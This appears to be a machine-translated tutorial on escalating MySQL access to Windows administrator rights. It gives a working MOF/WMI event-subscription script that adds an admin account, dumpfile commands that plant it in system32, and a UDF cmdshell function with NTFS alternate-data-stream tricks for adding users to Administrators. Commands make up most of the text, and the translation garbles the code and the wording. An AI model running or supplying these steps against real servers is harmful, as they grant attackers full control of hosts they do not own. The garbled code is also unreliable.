1.MOF right to lift
Simply put, MOF is a program within the system, and every time the system is executed with root authority, we replace it and execute our attack code. This is referred to as the MOF right.
Here's the script:
1#pragmanamespace("\\\\.\\root\\subscription") 2 3Instance of__EventFilter as$EventFilter4 { 5Eventnamespace ="root\\cimv2"; 6Name ="filtP2"; 7Query ="Select * from __InstanceModificationEvent" 8 "Where targetinstance Isa \"Win32_localtime\" " 9 "and Targetinstance.second = 5"; TenQueryLanguage ="WQL"; One }; A -Instance ofActivescripteventconsumer as$Consumer - { theName ="consPCSV2"; -Scriptingengine ="JScript"; -ScriptText = - "var WSH = new ActiveXObject (\"Wscript.shell\") \nwsh.run (\"Net.exe user admin admin/add\")"; + }; - +Instance of__filtertoconsumerbinding A { atConsumer =$Consumer; - Filter=$EventFilter; -};
Save As A.mof then find a writable directory to upload a.mof, using MySQL execution: select Load_file (' D:\wamp\a.mof ') into DumpFile ' c:/windows/system32/wbem/mof/ Nullevt.mof ';
To be able to claim success. PS: Add the account password in the script.
2.UDF right to lift
0x01
You need to judge the version first. And you need to add a slash when you export the DLL.
MySQL version < 5.2, UDF export to system directory c:/windows/system32/
MySQL version > 5.2, UDF Export to installation path mysql\lib\plugin\ generally is greater than 5.2, and the [Plugin] directory does not exist by default. Can be created by a chopper, if not possible through the 0x03 NTFS stream.
0x02
Create a Cmdshell function
Create function Cmdshell returns string Soname ' Udf.dll ';
Select Cmdshell (' Net user Waitalone Waitalone.cn/add ');
Select Cmdshell (' net localgroup Administrators Waitalone/add ');
Drop function Cmdshell; Delete a function
Delete from Mysql.func where name= ' Cmdshell ' remove function
0x03
By default, you will encounter can ' t Open Shared Library is a folder problem, you need to create a first-mentioned folder, you can directly new kitchen knives, if not, you can create through NTFS.
Find the directory for MySQL: select @ @basedir;
Create lib directory with NTFS ads: Select ' It is dll ' into DumpFile ' c:\\program Files\\mysql\\mysql Server 5.1\\lib:: $INDEX _allocation ';
Create plugin directory with NTFS ads: Select ' It is dll ' into DumpFile ' c:\\program Files\\mysql\\mysql Server 5.1\\lib\\plugin:: $INDEX _ ALLOCATION ';
Then, after exporting, the function is then created to execute the CMD.
Summary of MySQL right to withdraw